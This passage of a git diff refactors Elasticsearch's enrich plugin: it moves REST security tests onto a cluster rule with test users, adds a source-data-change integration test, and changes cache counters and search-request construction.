executePolicyRequest).actionGet(); + } + +} diff --git a/x-pack/plugin/enrich/src/internalClusterTest/java/org/elasticsearch/xpack/enrich/EnrichSourceDataChangeIT.java b/x-pack/plugin/enrich/src/internalClusterTest/java/org/elasticsearch/xpack/enrich/EnrichSourceDataChangeIT.java new file mode 100644 index 0000000000000..74fe6315a1ae2 --- /dev/null +++ b/x-pack/plugin/enrich/src/internalClusterTest/java/org/elasticsearch/xpack/enrich/EnrichSourceDataChangeIT.java @@ -0,0 +1,167 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.enrich; + +import org.elasticsearch.action.get.GetRequest; +import org.elasticsearch.action.index.IndexRequest; +import org.elasticsearch.action.support.WriteRequest; +import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.core.Strings; +import org.elasticsearch.ingest.common.IngestCommonPlugin; +import org.elasticsearch.plugins.Plugin; +import org.elasticsearch.reindex.ReindexPlugin; +import org.elasticsearch.test.ESSingleNodeTestCase; +import org.elasticsearch.xcontent.XContentType; +import org.elasticsearch.xpack.core.XPackSettings; +import org.elasticsearch.xpack.core.enrich.EnrichPolicy; +import org.elasticsearch.xpack.core.enrich.action.ExecuteEnrichPolicyAction; +import org.elasticsearch.xpack.core.enrich.action.PutEnrichPolicyAction; + +import java.util.Collection; +import java.util.List; +import java.util.Map; + +import static org.elasticsearch.xpack.enrich.AbstractEnrichTestCase.createSourceIndices; +import static org.hamcrest.Matchers.equalTo; + +public class EnrichSourceDataChangeIT extends ESSingleNodeTestCase { + + @Override + protected Collection> getPlugins() { + return List.of(LocalStateEnrich.class, ReindexPlugin.class, IngestCommonPlugin.class); + } + + @Override + protected Settings nodeSettings() { + return Settings.builder() + // TODO Change this to run with security enabled + // https://github.com/elastic/elasticsearch/issues/75940 + .put(XPackSettings.SECURITY_ENABLED.getKey(), false) + .build(); + } + + private final String policyName = "device-enrich-policy"; + private final String sourceIndexName = "devices-idx"; + + public void testChangesToTheSourceIndexTakeEffectOnPolicyExecution() throws Exception { + // create and store the enrich policy + final var enrichPolicy = new EnrichPolicy( + EnrichPolicy.MATCH_TYPE, + null, + List.of(sourceIndexName), + "host.ip", + List.of("device.name", "host.ip") + ); + + // create the source index + createSourceIndices(client(), enrichPolicy); + + final String initialDeviceName = "some.device." 
+ randomAlphaOfLength(10); + + // add a single document to the enrich index + setEnrichDeviceName(initialDeviceName); + + // store the enrich policy and execute it + var putPolicyRequest = new PutEnrichPolicyAction.Request(TEST_REQUEST_TIMEOUT, policyName, enrichPolicy); + client().execute(PutEnrichPolicyAction.INSTANCE, putPolicyRequest).actionGet(); + executeEnrichPolicy(); + + // create an honest to goodness pipeline for repeated executions (we're not running any _simulate requests here) + final String pipelineName = "my-pipeline"; + putJsonPipeline(pipelineName, """ + { + "processors": [ + { + "enrich": { + "policy_name": "device-enrich-policy", + "field": "host.ip", + "target_field": "_tmp.device" + } + }, + { + "rename" : { + "field" : "_tmp.device.device.name", + "target_field" : "device.name" + } + }, + { + "remove" : { + "field" : "_tmp" + } + } + ] + }"""); + + { + final var indexRequest = new IndexRequest(sourceIndexName); + indexRequest.id("1"); + indexRequest.setPipeline("my-pipeline"); + indexRequest.source(""" + { + "host": { + "ip": "10.151.80.8" + } + } + """, XContentType.JSON); + indexRequest.setRefreshPolicy(WriteRequest.RefreshPolicy.IMMEDIATE); + client().index(indexRequest).actionGet(); + + final var response = client().get(new GetRequest(sourceIndexName).id("1")).actionGet(); + assertThat(response.getSource().get("device"), equalTo(Map.of("name", initialDeviceName))); + } + + // add different document to the enrich index + final String changedDeviceName = "some.device." + randomAlphaOfLength(10); + setEnrichDeviceName(changedDeviceName); + + // execute the policy to pick up the change + executeEnrichPolicy(); + + // it can take a moment for the execution to take effect, so assertBusy + assertBusy(() -> { + final var indexRequest = new IndexRequest(sourceIndexName); + indexRequest.id("2"); + indexRequest.setPipeline("my-pipeline"); + indexRequest.source(""" + { + "host": { + "ip": "10.151.80.8" + } + } + """, XContentType.JSON); + indexRequest.setRefreshPolicy(WriteRequest.RefreshPolicy.IMMEDIATE); + client().index(indexRequest).actionGet(); + + final var response = client().get(new GetRequest(sourceIndexName).id("2")).actionGet(); + assertThat(response.getSource().get("device"), equalTo(Map.of("name", changedDeviceName))); + }); + } + + private void setEnrichDeviceName(final String deviceName) { + final var indexRequest = new IndexRequest(sourceIndexName); + indexRequest.id("1"); // there's only one document, and we keep overwriting it + indexRequest.source(Strings.format(""" + { + "host": { + "ip": "10.151.80.8" + }, + "device": { + "name": "%s" + } + } + """, deviceName), XContentType.JSON); + indexRequest.setRefreshPolicy(WriteRequest.RefreshPolicy.IMMEDIATE); + client().index(indexRequest).actionGet(); + } + + private void executeEnrichPolicy() { + final var executePolicyRequest = new ExecuteEnrichPolicyAction.Request(TEST_REQUEST_TIMEOUT, policyName); + client().execute(ExecuteEnrichPolicyAction.INSTANCE, executePolicyRequest).actionGet(); + } + +} diff --git a/x-pack/plugin/enrich/qa/common/src/main/java/org/elasticsearch/test/enrich/CommonEnrichRestTestCase.java b/x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/CommonEnrichRestTestCase.java similarity index 92% rename from x-pack/plugin/enrich/qa/common/src/main/java/org/elasticsearch/test/enrich/CommonEnrichRestTestCase.java rename to x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/CommonEnrichRestTestCase.java index 7107553d8b8b3..6c1f6055a4d22 100644 --- 
a/x-pack/plugin/enrich/qa/common/src/main/java/org/elasticsearch/test/enrich/CommonEnrichRestTestCase.java +++ b/x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/CommonEnrichRestTestCase.java @@ -11,10 +11,14 @@ import org.elasticsearch.client.Response; import org.elasticsearch.client.ResponseException; import org.elasticsearch.common.Strings; +import org.elasticsearch.common.settings.SecureString; import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.common.util.concurrent.ThreadContext; import org.elasticsearch.common.xcontent.XContentHelper; import org.elasticsearch.common.xcontent.support.XContentMapValues; import org.elasticsearch.index.query.QueryBuilders; +import org.elasticsearch.test.cluster.ElasticsearchCluster; +import org.elasticsearch.test.cluster.local.LocalClusterSpecBuilder; import org.elasticsearch.test.rest.ESRestTestCase; import org.elasticsearch.xcontent.XContentBuilder; import org.elasticsearch.xcontent.json.JsonXContent; @@ -34,6 +38,27 @@ public abstract class CommonEnrichRestTestCase extends ESRestTestCase { + static LocalClusterSpecBuilder enrichCluster(String license, boolean isSecurityEnabled) { + return ElasticsearchCluster.local() + .module("analysis-common") + .module("ingest-common") + .module("mapper-extras") + .module("x-pack-enrich") + .module("x-pack-monitoring") + .module("x-pack-ilm") + .module("wildcard") + .setting("xpack.security.enabled", Boolean.toString(isSecurityEnabled)) + .setting("xpack.license.self_generated.type", license) + // silence stats collector errors (we don't want to add all xpack modules here) + .setting("logger.org.elasticsearch.xpack.monitoring.collector", "fatal") + .setting("xpack.monitoring.collection.enabled", "true"); + } + + static Settings authRequestHeaderSetting(String user, String password) { + String token = basicAuthHeaderValue(user, new SecureString(password.toCharArray())); + return Settings.builder().put(ThreadContext.PREFIX + ".Authorization", token).build(); + } + private List cleanupPipelines = new ArrayList<>(); /** diff --git a/x-pack/plugin/enrich/qa/rest-with-advanced-security/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichAdvancedSecurityIT.java b/x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichAdvancedSecurityIT.java similarity index 88% rename from x-pack/plugin/enrich/qa/rest-with-advanced-security/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichAdvancedSecurityIT.java rename to x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichAdvancedSecurityIT.java index 7621e975eab22..ebd6b4444710a 100644 --- a/x-pack/plugin/enrich/qa/rest-with-advanced-security/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichAdvancedSecurityIT.java +++ b/x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichAdvancedSecurityIT.java @@ -4,13 +4,13 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. 
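
The same migration applies to the security fixtures: the extraConfigFile 'roles.yml' lines from the deleted build files become a classpath resource on the cluster rule, and test users are declared on the rule rather than in Gradle. A sketch, with values from the subclass below:

    ElasticsearchCluster cluster = enrichCluster("trial", true)
        .rolesFile(Resource.fromClasspath("advanced_roles.yml"))
        .user("test_admin", "x-pack-test-password", "superuser", true)
        .build();
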
*/ -package org.elasticsearch.xpack.enrich; +package org.elasticsearch.test.enrich; import org.elasticsearch.client.Request; -import org.elasticsearch.common.settings.SecureString; import org.elasticsearch.common.settings.Settings; -import org.elasticsearch.common.util.concurrent.ThreadContext; -import org.elasticsearch.test.enrich.CommonEnrichRestTestCase; +import org.elasticsearch.test.cluster.ElasticsearchCluster; +import org.elasticsearch.test.cluster.util.resource.Resource; +import org.junit.ClassRule; import java.io.IOException; import java.util.Map; @@ -20,16 +20,29 @@ public class EnrichAdvancedSecurityIT extends CommonEnrichRestTestCase { + public static final String ADMIN_USER = "test_admin"; + public static final String ENRICH_USER = "test_enrich"; + public static final String TEST_PASSWORD = "x-pack-test-password"; + + @ClassRule + public static ElasticsearchCluster cluster = enrichCluster("trial", true).rolesFile(Resource.fromClasspath("advanced_roles.yml")) + .user(ADMIN_USER, TEST_PASSWORD, "superuser", true) + .user(ENRICH_USER, TEST_PASSWORD, "integ_test_role", false) + .build(); + + @Override + protected String getTestRestCluster() { + return cluster.getHttpAddresses(); + } + @Override protected Settings restClientSettings() { - String token = basicAuthHeaderValue("test_enrich", new SecureString("x-pack-test-password".toCharArray())); - return Settings.builder().put(ThreadContext.PREFIX + ".Authorization", token).build(); + return authRequestHeaderSetting(ENRICH_USER, TEST_PASSWORD); } @Override protected Settings restAdminSettings() { - String token = basicAuthHeaderValue("test_admin", new SecureString("x-pack-test-password".toCharArray())); - return Settings.builder().put(ThreadContext.PREFIX + ".Authorization", token).build(); + return authRequestHeaderSetting(ADMIN_USER, TEST_PASSWORD); } public void testEnrichEnforcesDLS() throws IOException { diff --git a/x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichIT.java b/x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichIT.java new file mode 100644 index 0000000000000..b24e43f4c7581 --- /dev/null +++ b/x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichIT.java @@ -0,0 +1,20 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. 
+ */ +package org.elasticsearch.test.enrich; + +import org.elasticsearch.test.cluster.ElasticsearchCluster; +import org.junit.ClassRule; + +public class EnrichIT extends CommonEnrichRestTestCase { + @ClassRule + public static ElasticsearchCluster cluster = enrichCluster("basic", false).build(); + + @Override + protected String getTestRestCluster() { + return cluster.getHttpAddresses(); + } +} diff --git a/x-pack/plugin/enrich/qa/rest-with-security/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichSecurityFailureIT.java b/x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichSecurityFailureIT.java similarity index 53% rename from x-pack/plugin/enrich/qa/rest-with-security/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichSecurityFailureIT.java rename to x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichSecurityFailureIT.java index 0efb3efe2928d..8d6fb67c44145 100644 --- a/x-pack/plugin/enrich/qa/rest-with-security/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichSecurityFailureIT.java +++ b/x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichSecurityFailureIT.java @@ -4,30 +4,42 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -package org.elasticsearch.xpack.enrich; +package org.elasticsearch.test.enrich; import org.elasticsearch.client.Request; import org.elasticsearch.client.ResponseException; -import org.elasticsearch.common.settings.SecureString; import org.elasticsearch.common.settings.Settings; -import org.elasticsearch.common.util.concurrent.ThreadContext; -import org.elasticsearch.test.enrich.CommonEnrichRestTestCase; +import org.elasticsearch.test.cluster.ElasticsearchCluster; +import org.elasticsearch.test.cluster.util.resource.Resource; import org.elasticsearch.test.rest.ESRestTestCase; - -import static org.elasticsearch.xpack.core.security.authc.support.UsernamePasswordToken.basicAuthHeaderValue; +import org.junit.ClassRule; public class EnrichSecurityFailureIT extends ESRestTestCase { + public static final String ADMIN_USER = "test_admin"; + public static final String ENRICH_USER = "test_enrich_no_privs"; + public static final String TEST_PASSWORD = "x-pack-test-password"; + + @ClassRule + public static ElasticsearchCluster cluster = CommonEnrichRestTestCase.enrichCluster("basic", true) + .rolesFile(Resource.fromClasspath("roles.yml")) + .user(ADMIN_USER, TEST_PASSWORD, "superuser", true) + .user(ENRICH_USER, TEST_PASSWORD, "enrich_no_privs", false) + .build(); + + @Override + protected String getTestRestCluster() { + return cluster.getHttpAddresses(); + } + @Override protected Settings restClientSettings() { - String token = basicAuthHeaderValue("test_enrich_no_privs", new SecureString("x-pack-test-password".toCharArray())); - return Settings.builder().put(ThreadContext.PREFIX + ".Authorization", token).build(); + return CommonEnrichRestTestCase.authRequestHeaderSetting(ENRICH_USER, TEST_PASSWORD); } @Override protected Settings restAdminSettings() { - String token = basicAuthHeaderValue("test_admin", new SecureString("x-pack-test-password".toCharArray())); - return Settings.builder().put(ThreadContext.PREFIX + ".Authorization", token).build(); + return CommonEnrichRestTestCase.authRequestHeaderSetting(ADMIN_USER, TEST_PASSWORD); } public void testFailure() throws Exception { diff --git a/x-pack/plugin/enrich/qa/rest-with-security/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichSecurityIT.java 
b/x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichSecurityIT.java similarity index 65% rename from x-pack/plugin/enrich/qa/rest-with-security/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichSecurityIT.java rename to x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichSecurityIT.java index 1d3a1c8b93561..f65f0f4b77c5b 100644 --- a/x-pack/plugin/enrich/qa/rest-with-security/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichSecurityIT.java +++ b/x-pack/plugin/enrich/src/javaRestTest/java/org/elasticsearch/test/enrich/EnrichSecurityIT.java @@ -4,30 +4,43 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -package org.elasticsearch.xpack.enrich; +package org.elasticsearch.test.enrich; import org.elasticsearch.client.Request; import org.elasticsearch.client.ResponseException; -import org.elasticsearch.common.settings.SecureString; import org.elasticsearch.common.settings.Settings; -import org.elasticsearch.common.util.concurrent.ThreadContext; import org.elasticsearch.core.Strings; -import org.elasticsearch.test.enrich.CommonEnrichRestTestCase; +import org.elasticsearch.test.cluster.ElasticsearchCluster; +import org.elasticsearch.test.cluster.util.resource.Resource; +import org.junit.ClassRule; import static org.hamcrest.CoreMatchers.containsString; public class EnrichSecurityIT extends CommonEnrichRestTestCase { + public static final String ADMIN_USER = "test_admin"; + public static final String ENRICH_USER = "test_enrich"; + public static final String TEST_PASSWORD = "x-pack-test-password"; + + @ClassRule + public static ElasticsearchCluster cluster = enrichCluster("basic", true).rolesFile(Resource.fromClasspath("roles.yml")) + .user(ADMIN_USER, TEST_PASSWORD, "superuser", true) + .user(ENRICH_USER, TEST_PASSWORD, "enrich_user,integ_test_role", false) + .build(); + + @Override + protected String getTestRestCluster() { + return cluster.getHttpAddresses(); + } + @Override protected Settings restClientSettings() { - String token = basicAuthHeaderValue("test_enrich", new SecureString("x-pack-test-password".toCharArray())); - return Settings.builder().put(ThreadContext.PREFIX + ".Authorization", token).build(); + return authRequestHeaderSetting(ENRICH_USER, TEST_PASSWORD); } @Override protected Settings restAdminSettings() { - String token = basicAuthHeaderValue("test_admin", new SecureString("x-pack-test-password".toCharArray())); - return Settings.builder().put(ThreadContext.PREFIX + ".Authorization", token).build(); + return authRequestHeaderSetting(ADMIN_USER, TEST_PASSWORD); } public void testInsufficientPermissionsOnNonExistentIndex() throws Exception { diff --git a/x-pack/plugin/enrich/qa/rest-with-advanced-security/roles.yml b/x-pack/plugin/enrich/src/javaRestTest/resources/advanced_roles.yml similarity index 100% rename from x-pack/plugin/enrich/qa/rest-with-advanced-security/roles.yml rename to x-pack/plugin/enrich/src/javaRestTest/resources/advanced_roles.yml diff --git a/x-pack/plugin/enrich/qa/rest-with-security/roles.yml b/x-pack/plugin/enrich/src/javaRestTest/resources/roles.yml similarity index 100% rename from x-pack/plugin/enrich/qa/rest-with-security/roles.yml rename to x-pack/plugin/enrich/src/javaRestTest/resources/roles.yml diff --git a/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/AbstractEnrichProcessor.java b/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/AbstractEnrichProcessor.java index c2bcc67184958..4903643795f18 
100644 --- a/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/AbstractEnrichProcessor.java +++ b/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/AbstractEnrichProcessor.java @@ -14,13 +14,12 @@ import org.elasticsearch.ingest.IngestDocument; import org.elasticsearch.script.TemplateScript; import org.elasticsearch.search.builder.SearchSourceBuilder; -import org.elasticsearch.xpack.core.enrich.EnrichPolicy; import java.util.ArrayList; import java.util.List; import java.util.Map; import java.util.function.BiConsumer; -import java.util.function.Supplier; +import java.util.function.Function; public abstract class AbstractEnrichProcessor extends AbstractProcessor { @@ -32,7 +31,6 @@ public abstract class AbstractEnrichProcessor extends AbstractProcessor { private final boolean overrideEnabled; protected final String matchField; protected final int maxMatches; - private final String indexAlias; protected AbstractEnrichProcessor( String tag, @@ -55,8 +53,6 @@ protected AbstractEnrichProcessor( this.overrideEnabled = overrideEnabled; this.matchField = matchField; this.maxMatches = maxMatches; - // note: since the policyName determines the indexAlias, we can calculate this once - this.indexAlias = EnrichPolicy.getBaseName(policyName); } public abstract QueryBuilder getQueryBuilder(Object fieldValue); @@ -72,7 +68,7 @@ public void execute(IngestDocument ingestDocument, BiConsumer searchRequestSupplier = () -> { + final Function searchRequestBuilder = (concreteEnrichIndex) -> { QueryBuilder queryBuilder = getQueryBuilder(value); ConstantScoreQueryBuilder constantScore = new ConstantScoreQueryBuilder(queryBuilder); SearchSourceBuilder searchBuilder = new SearchSourceBuilder(); @@ -82,13 +78,13 @@ public void execute(IngestDocument ingestDocument, BiConsumer { + searchRunner.accept(value, maxMatches, searchRequestBuilder, (searchHits, e) -> { if (e != null) { handler.accept(null, e); return; diff --git a/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/EnrichCache.java b/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/EnrichCache.java index 6a621d1539d55..c0dc1b70835ba 100644 --- a/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/EnrichCache.java +++ b/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/EnrichCache.java @@ -23,7 +23,7 @@ import java.util.Collections; import java.util.List; import java.util.Map; -import java.util.concurrent.atomic.AtomicLong; +import java.util.concurrent.atomic.LongAdder; import java.util.function.Consumer; import java.util.function.LongSupplier; import java.util.function.ToLongBiFunction; @@ -47,9 +47,9 @@ public final class EnrichCache { private final Cache cache; private final LongSupplier relativeNanoTimeProvider; - private final AtomicLong hitsTimeInNanos = new AtomicLong(0); - private final AtomicLong missesTimeInNanos = new AtomicLong(0); - private final AtomicLong sizeInBytes = new AtomicLong(0); + private final LongAdder hitsTimeInNanos = new LongAdder(); + private final LongAdder missesTimeInNanos = new LongAdder(); + private final LongAdder sizeInBytes = new LongAdder(); EnrichCache(long maxSize) { this(maxSize, System::nanoTime); @@ -72,7 +72,7 @@ public final class EnrichCache { private Cache createCache(long maxWeight, ToLongBiFunction weigher) { var builder = CacheBuilder.builder().setMaximumWeight(maxWeight).removalListener(notification -> { - sizeInBytes.getAndAdd(-1 * notification.getValue().sizeInBytes); + sizeInBytes.add(-1 * 
notification.getValue().sizeInBytes); }); if (weigher != null) { builder.weigher(weigher); @@ -105,7 +105,7 @@ public void computeIfAbsent( List> response = get(cacheKey); long cacheRequestTime = relativeNanoTimeProvider.getAsLong() - cacheStart; if (response != null) { - hitsTimeInNanos.addAndGet(cacheRequestTime); + hitsTimeInNanos.add(cacheRequestTime); listener.onResponse(response); } else { final long retrieveStart = relativeNanoTimeProvider.getAsLong(); @@ -114,7 +114,7 @@ public void computeIfAbsent( put(cacheKey, cacheValue); List> copy = deepCopy(cacheValue.hits, false); long databaseQueryAndCachePutTime = relativeNanoTimeProvider.getAsLong() - retrieveStart; - missesTimeInNanos.addAndGet(cacheRequestTime + databaseQueryAndCachePutTime); + missesTimeInNanos.add(cacheRequestTime + databaseQueryAndCachePutTime); listener.onResponse(copy); }, listener::onFailure)); } @@ -133,7 +133,7 @@ public void computeIfAbsent( // non-private for unit testing only void put(CacheKey cacheKey, CacheValue cacheValue) { cache.put(cacheKey, cacheValue); - sizeInBytes.addAndGet(cacheValue.sizeInBytes); + sizeInBytes.add(cacheValue.sizeInBytes); } public EnrichStatsAction.Response.CacheStats getStats(String localNodeId) { @@ -144,9 +144,9 @@ public EnrichStatsAction.Response.CacheStats getStats(String localNodeId) { cacheStats.getHits(), cacheStats.getMisses(), cacheStats.getEvictions(), - TimeValue.nsecToMSec(hitsTimeInNanos.get()), - TimeValue.nsecToMSec(missesTimeInNanos.get()), - sizeInBytes.get() + TimeValue.nsecToMSec(hitsTimeInNanos.sum()), + TimeValue.nsecToMSec(missesTimeInNanos.sum()), + sizeInBytes.sum() ); } diff --git a/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/EnrichProcessorFactory.java b/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/EnrichProcessorFactory.java index ee685a7b86d2b..55f7fdcfbb790 100644 --- a/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/EnrichProcessorFactory.java +++ b/x-pack/plugin/enrich/src/main/java/org/elasticsearch/xpack/enrich/EnrichProcessorFactory.java @@ -15,7 +15,6 @@ import org.elasticsearch.cluster.metadata.IndexMetadata; import org.elasticsearch.cluster.metadata.Metadata; import org.elasticsearch.cluster.metadata.ProjectId; -import org.elasticsearch.cluster.metadata.ProjectMetadata; import org.elasticsearch.common.geo.Orientation; import org.elasticsearch.common.geo.ShapeRelation; import org.elasticsearch.common.xcontent.support.XContentMapValues; @@ -32,7 +31,7 @@ import java.util.Objects; import java.util.function.BiConsumer; import java.util.function.Consumer; -import java.util.function.Supplier; +import java.util.function.Function; import static org.elasticsearch.xpack.core.ClientHelper.ENRICH_ORIGIN; @@ -64,14 +63,18 @@ public Processor create( if (metadata == null) { throw new IllegalStateException("enrich processor factory has not yet been initialized with cluster state"); } - final var project = metadata.getProject(projectId); - IndexAbstraction indexAbstraction = project.getIndicesLookup().get(indexAlias); - if (indexAbstraction == null) { - throw new IllegalArgumentException("no enrich index exists for policy with name [" + policyName + "]"); + + final IndexMetadata imd; + { + final var project = metadata.getProject(projectId); + IndexAbstraction indexAbstraction = project.getIndicesLookup().get(indexAlias); + if (indexAbstraction == null) { + throw new IllegalArgumentException("no enrich index exists for policy with name [" + policyName + "]"); + } + assert indexAbstraction.getType() 
== IndexAbstraction.Type.ALIAS; + assert indexAbstraction.getIndices().size() == 1; + imd = project.index(indexAbstraction.getIndices().get(0)); } - assert indexAbstraction.getType() == IndexAbstraction.Type.ALIAS; - assert indexAbstraction.getIndices().size() == 1; - IndexMetadata imd = project.index(indexAbstraction.getIndices().get(0)); Map mappingAsMap = imd.mapping().sourceAsMap(); String policyType = (String) XContentMapValues.extractValue( @@ -88,7 +91,7 @@ public Processor create( if (maxMatches < 1 || maxMatches > 128) { throw ConfigurationUtils.newConfigurationException(TYPE, tag, "max_matches", "should be between 1 and 128"); } - var searchRunner = createSearchRunner(project, indexAlias); + var searchRunner = createSearchRunner(projectId, indexAlias); switch (policyType) { case EnrichPolicy.MATCH_TYPE: case EnrichPolicy.RANGE_TYPE: @@ -133,18 +136,19 @@ public void accept(ClusterState state) { metadata = state.getMetadata(); } - private SearchRunner createSearchRunner(ProjectMetadata project, String indexAlias) { - Client originClient = new OriginSettingClient(client, ENRICH_ORIGIN); + private SearchRunner createSearchRunner(final ProjectId projectId, final String indexAlias) { + final Client originClient = new OriginSettingClient(client, ENRICH_ORIGIN); return (value, maxMatches, reqSupplier, handler) -> { + final String concreteEnrichIndex = getEnrichIndexKey(projectId, indexAlias); // intentionally non-locking for simplicity...it's OK if we re-put the same key/value in the cache during a race condition. enrichCache.computeIfAbsent( - project.id(), - getEnrichIndexKey(project, indexAlias), + projectId, + concreteEnrichIndex, value, maxMatches, (searchResponseActionListener) -> originClient.execute( EnrichCoordinatorProxyAction.INSTANCE, - reqSupplier.get(), + reqSupplier.apply(concreteEnrichIndex), searchResponseActionListener ), ActionListener.wrap(resp -> handler.accept(resp, null), e -> handler.accept(null, e)) @@ -152,8 +156,8 @@ private SearchRunner createSearchRunner(ProjectMetadata project, String indexAli }; } - private String getEnrichIndexKey(ProjectMetadata project, String indexAlias) { - IndexAbstraction ia = project.getIndicesLookup().get(indexAlias); + private String getEnrichIndexKey(final ProjectId projectId, final String indexAlias) { + IndexAbstraction ia = metadata.getProject(projectId).getIndicesLookup().get(indexAlias); if (ia == null) { throw new IndexNotFoundException("no generated enrich index [" + indexAlias + "]"); } @@ -164,7 +168,7 @@ public interface SearchRunner { void accept( Object value, int maxMatches, - Supplier searchRequestSupplier, + Function searchRequestBuilder, BiConsumer>, Exception> handler ); } diff --git a/x-pack/plugin/enrich/src/test/java/org/elasticsearch/xpack/enrich/GeoMatchProcessorTests.java b/x-pack/plugin/enrich/src/test/java/org/elasticsearch/xpack/enrich/GeoMatchProcessorTests.java index f122e34db5488..e0179f6b0c4a0 100644 --- a/x-pack/plugin/enrich/src/test/java/org/elasticsearch/xpack/enrich/GeoMatchProcessorTests.java +++ b/x-pack/plugin/enrich/src/test/java/org/elasticsearch/xpack/enrich/GeoMatchProcessorTests.java @@ -28,7 +28,7 @@ import java.util.List; import java.util.Map; import java.util.function.BiConsumer; -import java.util.function.Supplier; +import java.util.function.Function; import static org.elasticsearch.xpack.enrich.MatchProcessorTests.str; import static org.hamcrest.Matchers.emptyArray; @@ -162,10 +162,10 @@ private static final class MockSearchFunction implements EnrichProcessorFactory. 
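// note: mirroring the production change in EnrichProcessorFactory, the mock search runner now takes a Function that builds the request from the resolved concrete enrich index (the fixed placeholder ".enrich-_name" below) instead of a no-arg Supplier, so the captured request reflects the index the cache key was computed for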
public void accept( Object value, int maxMatches, - Supplier searchRequestSupplier, + Function searchRequestBuilder, BiConsumer>, Exception> handler ) { - capturedRequest.set(searchRequestSupplier.get()); + capturedRequest.set(searchRequestBuilder.apply(".enrich-_name")); if (exception != null) { handler.accept(null, exception); } else { diff --git a/x-pack/plugin/enrich/src/test/java/org/elasticsearch/xpack/enrich/MatchProcessorTests.java b/x-pack/plugin/enrich/src/test/java/org/elasticsearch/xpack/enrich/MatchProcessorTests.java index 4e3496e1a5838..3bf0fae2db0e5 100644 --- a/x-pack/plugin/enrich/src/test/java/org/elasticsearch/xpack/enrich/MatchProcessorTests.java +++ b/x-pack/plugin/enrich/src/test/java/org/elasticsearch/xpack/enrich/MatchProcessorTests.java @@ -25,7 +25,7 @@ import java.util.List; import java.util.Map; import java.util.function.BiConsumer; -import java.util.function.Supplier; +import java.util.function.Function; import static org.hamcrest.Matchers.emptyArray; import static org.hamcrest.Matchers.equalTo; @@ -405,10 +405,10 @@ private static final class MockSearchFunction implements EnrichProcessorFactory. public void accept( Object value, int maxMatches, - Supplier searchRequestSupplier, + Function searchRequestBuilder, BiConsumer>, Exception> handler ) { - capturedRequest.set(searchRequestSupplier.get()); + capturedRequest.set(searchRequestBuilder.apply(".enrich-_name")); if (exception != null) { handler.accept(null, exception); } else { diff --git a/x-pack/plugin/enrich/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/enrich/EnrichRestIT.java b/x-pack/plugin/enrich/src/yamlRestTest/java/org/elasticsearch/xpack/enrich/EnrichRestIT.java similarity index 59% rename from x-pack/plugin/enrich/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/enrich/EnrichRestIT.java rename to x-pack/plugin/enrich/src/yamlRestTest/java/org/elasticsearch/xpack/enrich/EnrichRestIT.java index 98b4ad024639e..761977ba65d98 100644 --- a/x-pack/plugin/enrich/qa/rest/src/yamlRestTest/java/org/elasticsearch/xpack/enrich/EnrichRestIT.java +++ b/x-pack/plugin/enrich/src/yamlRestTest/java/org/elasticsearch/xpack/enrich/EnrichRestIT.java @@ -9,11 +9,26 @@ import com.carrotsearch.randomizedtesting.annotations.ParametersFactory; +import org.elasticsearch.test.cluster.ElasticsearchCluster; +import org.elasticsearch.test.cluster.local.distribution.DistributionType; import org.elasticsearch.test.rest.yaml.ClientYamlTestCandidate; import org.elasticsearch.test.rest.yaml.ESClientYamlSuiteTestCase; +import org.junit.ClassRule; public class EnrichRestIT extends ESClientYamlSuiteTestCase { + @ClassRule + public static ElasticsearchCluster cluster = ElasticsearchCluster.local() + .distribution(DistributionType.DEFAULT) + .setting("xpack.security.enabled", "false") + 